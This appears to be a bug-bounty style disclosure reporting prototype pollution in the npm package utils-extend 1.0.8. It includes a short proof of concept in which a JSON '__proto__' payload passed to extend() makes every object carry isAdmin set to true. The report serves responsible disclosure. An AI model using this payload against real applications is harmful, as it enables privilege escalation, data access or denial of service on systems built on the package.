> NOTE! Thanks for submitting a report! Please replace all the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!
I would like to report prototype polution
in utils-extend
It allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation (DoS, access to sensitive data, RCE).
module name: utils-extendversion:1.0.8npm page: https://www.npmjs.com/package/utils-extend
> Extend nodejs util api, and it is light weight and simple.
[1] weekly downloads : 129,956
const { extend } = require('utils-extend');
const payload = '{"__proto__":{"isAdmin":true}}'
const emptyObject = {}
const pollutionObject = JSON.parse(payload);
extend({}, pollutionObject)
console.log(emptyObject.isAdmin) // true
node index.js
=> true> Select Y or N for the following statements:
Can result in: dos, access to restricted data, rce (depends on implementation)